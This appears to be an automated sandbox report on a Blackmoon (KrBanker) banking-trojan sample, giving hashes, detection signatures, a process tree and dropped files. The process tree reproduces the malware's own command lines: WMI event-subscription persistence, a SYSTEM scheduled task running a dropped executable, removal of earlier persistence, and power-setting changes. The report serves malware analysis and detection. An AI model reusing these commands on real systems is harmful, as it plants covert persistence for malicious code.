Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    102s
  • max time network
    103s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20/08/2024, 21:19

General

  • Target

    51a88b3ddca9383fb41774f44e1263f0N.exe

  • Size

    1.1MB

  • MD5

    51a88b3ddca9383fb41774f44e1263f0

  • SHA1

    f364ae968f3559a936126362d867d3615a20d8dd

  • SHA256

    eb752c61cfac892e83a69aad91eef9e9d03a67db225deed68c199fef293700f1

  • SHA512

    4c3140fd3b1046d8ae4d94862515dc978e9fa1e1108f2173927b50fff1a593632efa49afce02001740ee01956f926a0734261544c7dad5f2848b1cff35ff7502

  • SSDEEP

    6144:gL0RQ3YYWEowc1F0G0/VSyfdH75Q+mUTK:gL0RQ3YYWEodmGwH575Z

Malware Config

Signatures

  • Blackmoon, KrBanker

    Blackmoon also known as KrBanker is banking trojan first discovered in early 2014.

  • Detect Blackmoon payload 10 IoCs
  • Executes dropped EXE 5 IoCs
  • UPX packed file 10 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Indicator Removal: Clear Persistence 1 TTPs 2 IoCs

    Clear artifacts associated with previously established persistence like scheduletasks on a host.

  • Power Settings 1 TTPs 16 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • Drops file in System32 directory 4 IoCs
  • Drops file in Windows directory 10 IoCs
  • Program crash 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 49 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Modifies data under HKEY_USERS 16 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 28 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\51a88b3ddca9383fb41774f44e1263f0N.exe
    "C:\Users\Admin\AppData\Local\Temp\51a88b3ddca9383fb41774f44e1263f0N.exe"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: RenamesItself
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2344
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ping 127.0.0.1 -n 5 & Start c:\windows\fonts\idurvn\vlaebc.exe
      2⤵
      • System Location Discovery: System Language Discovery
      • System Network Configuration Discovery: Internet Connection Discovery
      • Suspicious use of WriteProcessMemory
      PID:3352
      • C:\Windows\SysWOW64\PING.EXE
        ping 127.0.0.1 -n 5
        3⤵
        • System Location Discovery: System Language Discovery
        • System Network Configuration Discovery: Internet Connection Discovery
        • Runs ping.exe
        PID:1452
      • \??\c:\windows\fonts\idurvn\vlaebc.exe
        c:\windows\fonts\idurvn\vlaebc.exe
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        PID:864
  • \??\c:\windows\fonts\idurvn\vlaebc.exe
    c:\windows\fonts\idurvn\vlaebc.exe
    1⤵
    • Executes dropped EXE
    • Drops file in System32 directory
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Modifies data under HKEY_USERS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3524
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter WHERE Name="uciwz" DELETE & wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer WHERE Name="yocua" DELETE & wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='uciwz'" DELETE
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4232
      • C:\Windows\SysWOW64\Wbem\WMIC.exe
        wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter WHERE Name="uciwz" DELETE
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:3136
      • C:\Windows\SysWOW64\Wbem\WMIC.exe
        wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer WHERE Name="yocua" DELETE
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:4864
      • C:\Windows\SysWOW64\Wbem\WMIC.exe
        wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='uciwz'" DELETE
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:3532
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="uciwz", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 30 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'" & wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="yocua",CommandLineTemplate="c:\windows\ime\ofxsjza\mzsxcaq.exe" & wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name="uciwz"", Consumer="CommandLineEventConsumer.Name="yocua""
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4280
      • C:\Windows\SysWOW64\Wbem\WMIC.exe
        wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="uciwz", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 30 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:208
      • C:\Windows\SysWOW64\Wbem\WMIC.exe
        wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="yocua",CommandLineTemplate="c:\windows\ime\ofxsjza\mzsxcaq.exe"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1252
      • C:\Windows\SysWOW64\Wbem\WMIC.exe
        wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name="uciwz"", Consumer="CommandLineEventConsumer.Name="yocua""
        3⤵
        • System Location Discovery: System Language Discovery
        PID:5088
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c Schtasks /DELETE /TN adfom /F
      2⤵
      • Indicator Removal: Clear Persistence
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3132
      • C:\Windows\SysWOW64\schtasks.exe
        Schtasks /DELETE /TN adfom /F
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2332
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c echo Y|schtasks /create /sc minute /mo 30 /tn "adfom" /ru system /tr "c:\windows\ime\ofxsjza\mzsxcaq.exe"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4172
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2388
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /sc minute /mo 30 /tn "adfom" /ru system /tr "c:\windows\ime\ofxsjza\mzsxcaq.exe"
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:4404
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c cmd /c powercfg -import c:\windows\fonts\idurvn\BestPower.pow
      2⤵
      • Power Settings
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2164
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c powercfg -import c:\windows\fonts\idurvn\BestPower.pow
        3⤵
        • Power Settings
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1832
        • C:\Windows\SysWOW64\powercfg.exe
          powercfg -import c:\windows\fonts\idurvn\BestPower.pow
          4⤵
          • Power Settings
          • System Location Discovery: System Language Discovery
          PID:2712
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c cmd /c powercfg -setactive b9e48a45-6d4e-4f69-b702-f57740a91a0a
      2⤵
      • Power Settings
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:868
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c powercfg -setactive b9e48a45-6d4e-4f69-b702-f57740a91a0a
        3⤵
        • Power Settings
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:5056
        • C:\Windows\SysWOW64\powercfg.exe
          powercfg -setactive b9e48a45-6d4e-4f69-b702-f57740a91a0a
          4⤵
          • Power Settings
          PID:4180
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c powercfg -h off
      2⤵
      • Power Settings
      • System Location Discovery: System Language Discovery
      PID:4424
      • C:\Windows\SysWOW64\powercfg.exe
        powercfg -h off
        3⤵
        • Power Settings
        • System Location Discovery: System Language Discovery
        PID:380
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3524 -s 1360
      2⤵
      • Program crash
      PID:3904
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 3524 -ip 3524
    1⤵
      PID:548
    • C:\Windows\system32\wbem\WmiApSrv.exe
      C:\Windows\system32\wbem\WmiApSrv.exe
      1⤵
        PID:1908
      • \??\c:\windows\ime\ofxsjza\mzsxcaq.exe
        c:\windows\ime\ofxsjza\mzsxcaq.exe
        1⤵
        • Executes dropped EXE
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of SetWindowsHookEx
        PID:3032
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c ping 127.0.0.1 -n 5 & Start c:\windows\fonts\idurvn\vlaebc.exe
          2⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          PID:2628
          • C:\Windows\SysWOW64\PING.EXE
            ping 127.0.0.1 -n 5
            3⤵
            • System Location Discovery: System Language Discovery
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:4324
          • \??\c:\windows\fonts\idurvn\vlaebc.exe
            c:\windows\fonts\idurvn\vlaebc.exe
            3⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of SetWindowsHookEx
            PID:2512
      • \??\c:\windows\fonts\idurvn\vlaebc.exe
        c:\windows\fonts\idurvn\vlaebc.exe
        1⤵
        • Executes dropped EXE
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of SetWindowsHookEx
        PID:1444
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter WHERE Name="uciwz" DELETE & wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer WHERE Name="yocua" DELETE & wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='uciwz'" DELETE
          2⤵
          • System Location Discovery: System Language Discovery
          PID:2612
          • C:\Windows\SysWOW64\Wbem\WMIC.exe
            wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter WHERE Name="uciwz" DELETE
            3⤵
            • System Location Discovery: System Language Discovery
            PID:3616
          • C:\Windows\SysWOW64\Wbem\WMIC.exe
            wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer WHERE Name="yocua" DELETE
            3⤵
            • System Location Discovery: System Language Discovery
            PID:2576
          • C:\Windows\SysWOW64\Wbem\WMIC.exe
            wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='uciwz'" DELETE
            3⤵
            • System Location Discovery: System Language Discovery
            PID:2924
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="uciwz", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 30 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'" & wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="yocua",CommandLineTemplate="c:\windows\ime\ofxsjza\mzsxcaq.exe" & wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name="uciwz"", Consumer="CommandLineEventConsumer.Name="yocua""
          2⤵
          • System Location Discovery: System Language Discovery
          PID:2260
          • C:\Windows\SysWOW64\Wbem\WMIC.exe
            wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="uciwz", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 30 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
            3⤵
            • System Location Discovery: System Language Discovery
            PID:4544
          • C:\Windows\SysWOW64\Wbem\WMIC.exe
            wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="yocua",CommandLineTemplate="c:\windows\ime\ofxsjza\mzsxcaq.exe"
            3⤵
            • System Location Discovery: System Language Discovery
            PID:4116
          • C:\Windows\SysWOW64\Wbem\WMIC.exe
            wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name="uciwz"", Consumer="CommandLineEventConsumer.Name="yocua""
            3⤵
            • System Location Discovery: System Language Discovery
            PID:4980
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c Schtasks /DELETE /TN adfom /F
          2⤵
          • Indicator Removal: Clear Persistence
          • System Location Discovery: System Language Discovery
          PID:2400
          • C:\Windows\SysWOW64\schtasks.exe
            Schtasks /DELETE /TN adfom /F
            3⤵
            • System Location Discovery: System Language Discovery
            PID:888
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c echo Y|schtasks /create /sc minute /mo 30 /tn "adfom" /ru system /tr "c:\windows\ime\ofxsjza\mzsxcaq.exe"
          2⤵
          • System Location Discovery: System Language Discovery
          PID:4204
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
            3⤵
            • System Location Discovery: System Language Discovery
            PID:3680
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /create /sc minute /mo 30 /tn "adfom" /ru system /tr "c:\windows\ime\ofxsjza\mzsxcaq.exe"
            3⤵
            • System Location Discovery: System Language Discovery
            • Scheduled Task/Job: Scheduled Task
            PID:452
        • C:\Windows\SysWOW64\cmd.exe
          cmd.exe /c cmd /c powercfg -import c:\windows\fonts\idurvn\BestPower.pow
          2⤵
          • Power Settings
          • System Location Discovery: System Language Discovery
          PID:4076
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c powercfg -import c:\windows\fonts\idurvn\BestPower.pow
            3⤵
            • Power Settings
            • System Location Discovery: System Language Discovery
            PID:4160
            • C:\Windows\SysWOW64\powercfg.exe
              powercfg -import c:\windows\fonts\idurvn\BestPower.pow
              4⤵
              • Power Settings
              • System Location Discovery: System Language Discovery
              PID:2140
        • C:\Windows\SysWOW64\cmd.exe
          cmd.exe /c cmd /c powercfg -setactive 18e7eeff-3de4-450b-98f4-08e1acdf8ff1
          2⤵
          • Power Settings
          • System Location Discovery: System Language Discovery
          PID:1988
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c powercfg -setactive 18e7eeff-3de4-450b-98f4-08e1acdf8ff1
            3⤵
            • Power Settings
            • System Location Discovery: System Language Discovery
            PID:3208
            • C:\Windows\SysWOW64\powercfg.exe
              powercfg -setactive 18e7eeff-3de4-450b-98f4-08e1acdf8ff1
              4⤵
              • Power Settings
              PID:736
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c powercfg -h off
          2⤵
          • Power Settings
          • System Location Discovery: System Language Discovery
          PID:4796
          • C:\Windows\SysWOW64\powercfg.exe
            powercfg -h off
            3⤵
            • Power Settings
            • System Location Discovery: System Language Discovery
            PID:552
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1444 -s 1380
          2⤵
          • Program crash
          PID:1416
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1444 -ip 1444
        1⤵
          PID:2748

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Windows\Fonts\idurvn\vlaebc.exe

          Filesize

          1.1MB

          MD5

          d0bde7047da59c1f9555ad7c52aa8749

          SHA1

          f3104286a4797fecab1fcf66a8b47d088db23314

          SHA256

          1250d448d0bbc9ec670c59a016098d8fe4fe77f9a413cf085387bd9515d28794

          SHA512

          7fc2440297d2c96113d0b8e03ab22070c9fd8e2a95d03f1c93d73ade1b076a772a2b649f6b82da4ff5fffb70a4dd8a46ab540a07dd1e08543856ce37aadd9be1

        • memory/864-9-0x0000000000400000-0x0000000000485000-memory.dmp

          Filesize

          532KB

        • memory/1444-26-0x0000000000400000-0x0000000000485000-memory.dmp

          Filesize

          532KB

        • memory/1444-34-0x0000000000400000-0x0000000000485000-memory.dmp

          Filesize

          532KB

        • memory/2344-0-0x0000000000400000-0x0000000000485000-memory.dmp

          Filesize

          532KB

        • memory/2344-4-0x0000000000400000-0x0000000000485000-memory.dmp

          Filesize

          532KB

        • memory/2512-25-0x0000000000400000-0x0000000000485000-memory.dmp

          Filesize

          532KB

        • memory/3032-21-0x0000000000400000-0x0000000000485000-memory.dmp

          Filesize

          532KB

        • memory/3524-10-0x0000000000400000-0x0000000000485000-memory.dmp

          Filesize

          532KB

        • memory/3524-17-0x0000000000400000-0x0000000000485000-memory.dmp

          Filesize

          532KB